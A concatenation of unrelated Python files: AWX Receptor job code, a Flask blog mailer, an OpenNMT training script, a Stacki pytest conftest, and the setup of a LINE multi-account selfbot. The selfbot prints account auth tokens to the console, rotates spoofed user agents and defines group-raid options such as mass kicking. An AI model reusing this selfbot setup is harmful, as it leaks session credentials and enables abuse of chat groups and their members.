execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params.update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = get_receptor_ctl()
res = None
try:
res = self._run_internal(receptor_ctl)
return res
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
# If an error occured without the job itself failing, it could be a broken instance
if self.work_type == 'ansible-runner' and ((res is None) or (getattr(res, 'rc', None) is None)):
execution_node_health_check(self.task.instance.execution_node)
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
_kw = {}
if self.work_type == 'ansible-runner':
_kw['node'] = self.task.instance.execution_node
use_stream_tls = get_conn_type(_kw['node'], receptor_ctl).name == "STREAMTLS"
_kw['tlsclient'] = get_tls_client(use_stream_tls)
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params, signwork=True, **_kw)
self.unit_id = result['unitid']
self.task.update_model(self.task.instance.pk, work_unit_id=result['unitid'])
sockin.close()
sockout.close()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
transmitter_thread.join()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
unit_status = receptor_ctl.simple_command(f'work status {self.unit_id}')
detail = unit_status['Detail']
state_name = unit_status['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occured at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
if not self.task.instance.result_traceback:
try:
resultsock = receptor_ctl.get_work_results(self.unit_id, return_sockfile=True)
lines = resultsock.readlines()
self.task.instance.result_traceback = b"".join(lines).decode()
self.task.instance.save(update_fields=['result_traceback'])
except Exception:
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local' and 'only_transmit_kwargs' not in self.runner_params:
self.runner_params['only_transmit_kwargs'] = True
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
if self.work_type == 'ansible-runner':
# on execution nodes, we rely on the private data dir being deleted
cli_params = f"--private-data-dir={private_data_dir} --delete"
else:
# on hybrid nodes, we rely on the private data dir NOT being deleted
cli_params = f"--private-data-dir={private_data_dir}"
receptor_params = {"params": cli_params}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
return 'kubernetes-runtime-auth'
return 'kubernetes-incluster-auth'
if self.task.instance.execution_node == settings.CLUSTER_HOST_ID or self.task.instance.execution_node == self.task.instance.controller_node:
return 'local'
return 'ansible-runner'
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
time.sleep(1)
@property
def pod_definition(self):
ee = self.task.instance.execution_environment
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
emails.py
|
#!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author:Administrator
@file: emails.py
@time: 2019/05/25
@software: PyCharm
@detail: 提醒邮件函数
"""
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from flask_babel import _
from bluelog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_async_mail(subject, to, html):
"""发送异步邮件"""
# 获取被代理的真实对象
app = current_app._get_current_object()
message = Message(subject, recipients=[to], html=html)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_new_comment_email(post):
post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments'
send_async_mail(subject=_('New comment'),
to=current_app.config['BLUELOG_ADMIN_EMAIL'],
html=_("""
<p>New comment in post <i>%(title)s</i>, click the link below to check:</p>
<p><a href="%(url)s">%(url)s</a></p>
<p><small style="color: #868e96">Do not reply this email.</small></p>
""", title=post.title, url=post_url )
)
def send_new_reply_email(comment):
post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments'
send_async_mail(subject=_('New reply'),
to=comment.email,
html=_("""
<p>New reply for the comment you left in post
<i>%(title)s</i>, click the link below to check:
</p>
<p><a href="%(url)s">%(url)s</a></p>
<p><small style="color: #868e96">Do not reply this email.</small></p>
""", title=comment.post.title, url=post_url)
)
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
import configargparse
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.logging import logger
from onmt.train_single import main as single_main
def main(opt):
if opt.rnn_type == "SRU" and not opt.gpu_ranks:
raise AssertionError("Using SRU requires -gpu_ranks set.")
if opt.epochs:
raise AssertionError("-epochs is deprecated please use -train_steps.")
if opt.truncated_decoder > 0 and opt.accum_count > 1:
raise AssertionError("BPTT is not compatible with -accum > 1")
if opt.gpuid:
raise AssertionError(
"gpuid is deprecated \
see world_size and gpu_ranks"
)
nb_gpu = len(opt.gpu_ranks)
if opt.world_size > 1:
mp = torch.multiprocessing.get_context("spawn")
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
procs.append(
mp.Process(
target=run,
args=(
opt,
device_id,
error_queue,
),
daemon=True,
)
)
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
for p in procs:
p.join()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
def run(opt, device_id, error_queue):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError(
"An error occurred in \
Distributed initialization"
)
single_main(opt, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
if __name__ == "__main__":
parser = configargparse.ArgumentParser(
description="train.py",
config_file_parser_class=configargparse.YAMLConfigFileParser,
formatter_class=configargparse.ArgumentDefaultsHelpFormatter,
)
opts.config_opts(parser)
opts.add_md_help_argument(parser)
opts.model_opts(parser)
opts.train_opts(parser)
opt = parser.parse_args()
main(opt)
|
conftest.py
|
import gc
from http.server import HTTPServer, SimpleHTTPRequestHandler
import json
import multiprocessing
import os
import random
import shutil
import signal
import subprocess
import tempfile
import time
import warnings
from django.core.servers import basehttp
from django.core.wsgi import get_wsgi_application
import pytest
@pytest.fixture(scope="session")
def dump_mysql():
# Create a temp file and open it for the subprocess command
file_fd, file_path = tempfile.mkstemp(suffix=".sql")
file_obj = os.fdopen(file_fd, mode="w")
# Dump the initial Stacki DB into an SQL file, to restore from
# after each test
if os.path.exists("/opt/stack/etc/root.my.cnf"):
subprocess.run([
"mysqldump",
"--defaults-file=/opt/stack/etc/root.my.cnf",
"--lock-all-tables",
"--add-drop-database",
"--databases",
"cluster"
], stdout=file_obj, check=True)
else:
subprocess.run([
"mysqldump",
"--lock-all-tables",
"--add-drop-database",
"--databases",
"cluster"
], stdout=file_obj, check=True)
# Close the file
file_obj.close()
# Done with the set up, yield our SQL file path
yield file_path
# Remove the SQL file
os.remove(file_path)
@pytest.fixture
def revert_database(dump_mysql):
# Don't need to do anything in the set up
yield
# Load a fresh database after each test
with open(dump_mysql) as sql:
if os.path.exists("/opt/stack/etc/root.my.cnf"):
subprocess.run([
"mysql",
"--defaults-file=/opt/stack/etc/root.my.cnf"
], stdin=sql, check=True)
else:
subprocess.run("mysql", stdin=sql, check=True)
@pytest.fixture
def revert_filesystem():
# The paths to capture and revert changes to
paths = (
"/etc",
"/export/stack",
"/tftpboot"
)
def clean_up():
# Unmount any existing overlay directories
with open("/proc/mounts", "r") as mounts:
# Create a tuple of lines because /proc/mounts will change
# as we unmount things
for mount in tuple(mounts):
if mount.startswith("overlay_"):
# Try three times to unmount the overlay
for attempt in range(1, 4):
try:
subprocess.run(
["umount", mount.split()[0]],
check=True
)
# It succeeded
break
except subprocess.CalledProcessError:
# Let's run sync to see if it helps
subprocess.run(["sync"])
# Run the garbase collector, just in case it releases
# some opened file handles
gc.collect()
if attempt < 3:
# Sleep for a few seconds to give the open file
# handles a chance to clean themselves up
time.sleep(3)
else:
# Let's dump out any suspects.
result = subprocess.run(
["lsof", "-x", "+D", mount.split()[1]],
stdout=subprocess.PIPE,
encoding='utf-8'
)
warnings.warn('Unable to unmount {} mounted on {}\n\n{}'.format(
mount.split()[0],
mount.split()[1],
result.stdout
))
# We couldn't unmount the overlay, abort the tests
pytest.exit("Couldn't unmount overlay on {}".format(mount.split()[1]))
# Make sure the overlay root is clean
if os.path.exists("/overlay"):
shutil.rmtree("/overlay")
# Make sure we are clean
clean_up()
# Now set up the overlays
for ndx, path in enumerate(paths):
# Make the overlay directories
overlay_dirs = {
"lowerdir": path,
"upperdir": os.path.join("/overlay", path[1:], "upper"),
"workdir": os.path.join("/overlay", path[1:], "work")
}
os.makedirs(overlay_dirs['upperdir'])
os.makedirs(overlay_dirs['workdir'])
# Mount the overlays
subprocess.run([
"mount",
"-t", "overlay",
f"overlay_{ndx}",
"-o", ",".join(f"{k}={v}" for k, v in overlay_dirs.items()),
path
], check=True)
yield
# Clean up after the test
clean_up()
@pytest.fixture
def revert_discovery():
# Nothing to do in set up
yield
# Make sure discovery is turned off, in case a test failed. We get
# four tries to actually shutdown the daemon
for _ in range(4):
result = subprocess.run(
["stack", "disable", "discovery"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
# Make sure we were actually able to shutdown any daemons.
if result.returncode == 0 and "Warning:" not in result.stdout:
break
else:
# Fail the test if the daemon isn't behaving
pytest.fail("Couldn't shut down discovery daemon")
# Blow away the log file
if os.path.exists("/var/log/stack-discovery.log"):
os.remove("/var/log/stack-discovery.log")
@pytest.fixture
def revert_routing_table():
# Get a snapshot of the existing routes
result = subprocess.run(
["ip", "route", "list"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
old_routes = { line.strip() for line in result.stdout.split('\n') if line }
yield
# Get a new view of the routing table
result = subprocess.run(
["ip", "route", "list"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
new_routes = { line.strip() for line in result.stdout.split('\n') if line }
# Remove any new routes
for route in new_routes:
if route not in old_routes:
result = subprocess.run(f"ip route del {route}", shell=True)
# Add in any missing old routes
for route in old_routes:
if route not in new_routes:
result = subprocess.run(f"ip route add {route}", shell=True)
@pytest.fixture
def add_host():
def _inner(hostname, rack, rank, appliance):
cmd = f'stack add host {hostname} rack={rack} rank={rank} appliance={appliance}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to add a dummy host')
# First use of the fixture adds backend-0-0
_inner('backend-0-0', '0', '0', 'backend')
# Then return the inner function, so we can call it inside the test
# to get more hosts added
return _inner
@pytest.fixture
def add_host_with_interface():
def _inner(hostname, rack, rank, appliance, interface):
cmd = f'stack add host {hostname} rack={rack} rank={rank} appliance={appliance}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to add a dummy host')
cmd = f'stack add host interface {hostname} interface={interface}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to add a dummy interface')
_inner('backend-0-0', '0', '1', 'backend', 'eth0')
return _inner
@pytest.fixture
def add_switch():
def _inner(hostname, rack, rank, appliance, make, model):
cmd = f'stack add host {hostname} rack={rack} rank={rank} appliance={appliance}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to add a dummy host')
cmd = f'stack set host attr {hostname} attr=component.make value={make}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to set make')
cmd = f'stack set host attr {hostname} attr=component.model value={model}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to set model')
_inner('switch-0-0', '0', '0', 'switch', 'fake', 'unrl')
return _inner
@pytest.fixture
def add_appliance(host):
def _inner(name):
result = host.run(f'stack add appliance {name}')
if result.rc != 0:
pytest.fail(f'unable to add dummy appliance "{name}"')
# First use of the fixture adds appliance "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more appliances added
return _inner
@pytest.fixture
def add_box(host):
def _inner(name):
result = host.run(f'stack add box {name}')
if result.rc != 0:
pytest.fail(f'unable to add dummy box "{name}"')
# First use of the fixture adds box "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more boxes added
return _inner
@pytest.fixture
def add_cart(host):
def _inner(name):
result = host.run(f'stack add cart {name}')
if result.rc != 0:
pytest.fail(f'unable to add cart box "{name}"')
# First use of the fixture adds cart "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more carts added
return _inner
@pytest.fixture
def add_environment(host):
def _inner(name):
result = host.run(f'stack add environment {name}')
if result.rc != 0:
pytest.fail(f'unable to add dummy environment "{name}"')
# First use of the fixture adds environment "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more environments added
return _inner
@pytest.fixture
def add_group(host):
def _inner(name):
result = host.run(f'stack add group {name}')
if result.rc != 0:
pytest.fail(f'unable to add dummy group "{name}"')
# First use of the fixture adds group "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more groups added
return _inner
@pytest.fixture
def add_network(host):
def _inner(name, address):
result = host.run(
f'stack add network {name} address={address} mask=255.255.255.0'
)
if result.rc != 0:
pytest.fail(f'unable to add dummy network "{name}"')
# First use of the fixture adds network "test"
_inner('test', '192.168.0.0')
# Then return the inner function, so we can call it inside the test
# to get more networks added
return _inner
@pytest.fixture
def set_host_interface(add_host_with_interface):
result = subprocess.run(
["stack", "list", "network", "private", "output-format=json"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
o = json.loads(result.stdout)
addr = o[0]["address"]
mask = o[0]["mask"]
result = subprocess.run(
["stack", "list", "host", "a:backend", "output-format=json"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
o = json.loads(result.stdout)
hostname = o[0]["host"]
result = subprocess.run(
["stack", "list", "host", "interface", "output-format=json"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
o = json.loads(result.stdout)
ip_list = []
interface = None
for line in o:
if line['host'] == hostname:
interface = line['interface']
# Make list of IP addresses
if line['ip']:
ip_list.append(line['ip'])
result = {
'hostname' : hostname,
'net_addr' : addr,
'net_mask' : mask,
'interface': interface,
'ip_list' : ip_list
}
return result
@pytest.fixture
def run_django_server():
# Run a Django server in a process
def runner():
try:
os.environ['DJANGO_SETTINGS_MODULE'] = 'stack.restapi.settings'
basehttp.run('127.0.0.1', 8000, get_wsgi_application())
except KeyboardInterrupt:
# The signal to exit
pass
process = multiprocessing.Process(target=runner)
process.daemon = True
process.start()
# Give the server a few seconds to get ready
time.sleep(2)
yield
# Tell the server it is time to clean up
os.kill(process.pid, signal.SIGINT)
process.join()
@pytest.fixture
def run_file_server():
# Run an HTTP server in a process
def runner():
try:
# Change to our test-files directory
os.chdir('/export/test-files')
# Serve them up
with HTTPServer(
('127.0.0.1', 8000),
SimpleHTTPRequestHandler
) as httpd:
httpd.serve_forever()
except KeyboardInterrupt:
# The signal to exit
pass
process = multiprocessing.Process(target=runner)
process.daemon = True
process.start()
# Give us a second to get going
time.sleep(1)
yield
# Tell the server it is time to clean up
os.kill(process.pid, signal.SIGINT)
process.join()
@pytest.fixture
def host_os(host):
if host.file('/etc/SuSE-release').exists:
return 'sles'
return 'redhat'
@pytest.fixture
def rmtree(tmpdir):
"""
This fixture lets you call rmtree(path) in a test, which simulates
deleting a directory and all it's files. It really moves it to
a temperary location and restores it when the test finishes.
"""
restore = []
def _inner(path):
result = subprocess.run(['mv', path, tmpdir.join(str(len(restore)))])
if result.returncode != 0:
pytest.fail(f'Unable to move {path}')
restore.append(path)
yield _inner
# For each directory to restore
for ndx, path in enumerate(restore):
# Delete any existing stuff
if os.path.exists(path):
shutil.rmtree(path)
# Move back the original data
result = subprocess.run(['mv', tmpdir.join(str(ndx)), path])
if result.returncode != 0:
pytest.fail(f'Unable to restory {path}')
@pytest.fixture
def invalid_host():
return 'invalid-{:04x}'.format(random.randint(0, 65535))
@pytest.fixture(scope="session")
def create_minimal_iso(tmpdir_factory):
"""
This fixture runs at the beginning of the testing session to build
the pallet minimal-1.0-sles12.x86_64.disk1.iso and copies it to the
/export/test-files/pallets/ folder.
All tests will share the same ISO, so don't do anything to it. At
the end of the session the ISO file is deleted.
"""
temp_dir = tmpdir_factory.mktemp("minimal", False)
# Change to the temp directory
with temp_dir.as_cwd():
# Create our pallet ISO
subprocess.run([
'stack', 'create', 'pallet',
'/export/test-files/pallets/roll-minimal.xml'
], check=True)
# Move our new ISO where the tests expect it
shutil.move(
temp_dir.join('minimal-1.0-sles12.x86_64.disk1.iso'),
'/export/test-files/pallets/minimal-1.0-sles12.x86_64.disk1.iso'
)
yield
# Clean up the ISO file
os.remove('/export/test-files/pallets/minimal-1.0-sles12.x86_64.disk1.iso')
@pytest.fixture(scope="session")
def create_blank_iso(tmpdir_factory):
"""
This fixture runs at the beginning of the testing session to build
the blank iso file (containing nothing) and copies it to the
/export/test-files/pallets/ folder.
All tests will share the same ISO, so don't do anything to it. At
the end of the session the ISO file is deleted.
"""
temp_dir = tmpdir_factory.mktemp("blank", False)
# Change to the temp directory
with temp_dir.as_cwd():
# Create our blank ISO
subprocess.run(['genisoimage', '-o', 'blank.iso', '.'], check=True)
# Move our new ISO where the tests expect it
shutil.move(
temp_dir.join('blank.iso'),
'/export/test-files/pallets/blank.iso'
)
yield
# Clean up the ISO file
os.remove('/export/test-files/pallets/blank.iso')
|
01.py
|
# -*- coding: utf-8 -*-
import linepy
from linepy import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, wikipedia, html5lib
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
from googletrans import Translator
import youtube_dl
#=============
cl = LineClient()
cl.log("Auth Token : " + str(cl.authToken))
channel = LineChannel(cl)
cl.log("Channel Access Token : " + str(channel.channelAccessToken))
poll = LinePoll(cl)
call = LineCall(cl)
lineProfile = cl.getProfile()
lineSettings = cl.getSettings()
mid = cl.getProfile().mid
responsename1 = cl.getProfile().displayName
ki = LineClient()
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
lineProfile = ki.getProfile()
lineSettings = ki.getSettings()
Amid = ki.getProfile().mid
responsename2 = ki.getProfile().displayName
kk = LineClient()
kk.log("Auth Token : " + str(kk.authToken))
channel2 = LineChannel(kk)
kk.log("Channel Access Token : " + str(channel2.channelAccessToken))
lineProfile = kk.getProfile()
lineSettings = kk.getSettings()
Bmid = ki.getProfile().mid
responsename3 = ki.getProfile().displayName
kc = LineClient()
kc.log("Auth Token : " + str(kc.authToken))
channel3 = LineChannel(kc)
kc.log("Channel Access Token : " + str(channel3.channelAccessToken))
lineProfile = kc.getProfile()
lineSettings = kc.getSettings()
Cmid = kc.getProfile().mid
responsename4 = kc.getProfile().displayName
km = LineClient()
km.log("Auth Token : " + str(km.authToken))
channel4 = LineChannel(km)
km.log("Channel Access Token : " + str(channel4.channelAccessToken))
lineProfile = km.getProfile()
lineSettings = km.getSettings()
Dmid = km.getProfile().mid
responsename5 = km.getProfile().displayName
kb = LineClient()
kb.log("Auth Token : " + str(kb.authToken))
channel5 = LineChannel(kb)
kb.log("Channel Access Token : " + str(channel5.channelAccessToken))
lineProfile = kb.getProfile()
lineSettings = kb.getSettings()
Emid = kb.getProfile().mid
responsename6 = kb.getProfile().displayName
sw = LineClient()
sw.log("Auth Token : " + str(sw.authToken))
channel6 = LineChannel(sw)
sw.log("Channel Access Token : " + str(channel6.channelAccessToken))
lineProfile = sw.getProfile()
lineSettings = sw.getSettings()
Zmid = sw.getProfile().mid
responsename7 = sw.getProfile().displayName
print("---LOGIN SUCCES---")
creator = ["ue6d8f9ef8f820fad9c65bbb5d1ec714b"]
owner = ["ue6d8f9ef8f820fad9c65bbb5d1ec714b"]
admin = ["ue6d8f9ef8f820fad9c65bbb5d1ec714b"]
staff = ["ue6d8f9ef8f820fad9c65bbb5d1ec714b"]
KAC = [cl,ki,kk,kc,km,kb]
ABC = [cl,ki,kk,kc,km,kb]
Bots = [mid,Amid,Bmid,Cmid,Dmid,Zmid]
Saints = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
protectantijs = []
ghost = []
welcome = []
msg_dict = {}
msg_dict1 = {}
settings = {
"Picture":False,
"group":{},
"changeCover":False,
"changeVideo":False,
"groupPicture":False,
"changePicture":False,
"autoJoinTicket":False,
"restartPoint": False,
"Kickallmember":False,
"userMention":{},
"timeRestart": {},
"server": {},
"simiSimi":{},
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
]
}
wait = {
"limit": 1,
"owner":{},
"admin":{},
"addadmin":False,
"delladmin":False,
"staff":{},
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{
"u5a0b4bb5d3a6d48aca8473326062af75": True
},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":False,
"contact":False,
"invite":False,
'autoJoin':True,
'autoAdd':False,
'autoBlock':False,
'Timeline':False,
'autoLeave':False,
'autoLeave1':False,
"detectMention":False,
"mentionKick":False,
"welcomeOn":False,
"stickerOn":False,
"Addsticker":{
"name": "",
"status":False
},
"stk":{},
"selfbot":True,
"Images":{},
"Img":{},
"Addimage":{
"name": "",
"status":False
},
"Videos":{},
"Addaudio":{
"name": "",
"status":False
},
"Addvideo":{
"name": "",
"status":False
},
"unsend":False,
"mention":"Ngintip aja nih...",
"Respontag":"Sekarang tag besok jatuh cinta... ",
"welcome":"Welcome...",
"leave":"See you next againt later...",
"comment":"Super Like by: Bot...",
"message":"Ready bots Protection \nProteCT your Groups...",
}
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
myProfile["displayName"] = lineProfile.displayName
myProfile["statusMessage"] = lineProfile.statusMessage
myProfile["pictureStatus"] = lineProfile.pictureStatus
with open('creator.json', 'r') as fp:
creator = json.load(fp)
with open('owner.json', 'r') as fp:
owner = json.load(fp)
Setbot = codecs.open("setting.json","r","utf-8")
imagesOpen = codecs.open("image.json","r","utf-8")
videosOpen = codecs.open("video.json","r","utf-8")
stickersOpen = codecs.open("sticker.json","r","utf-8")
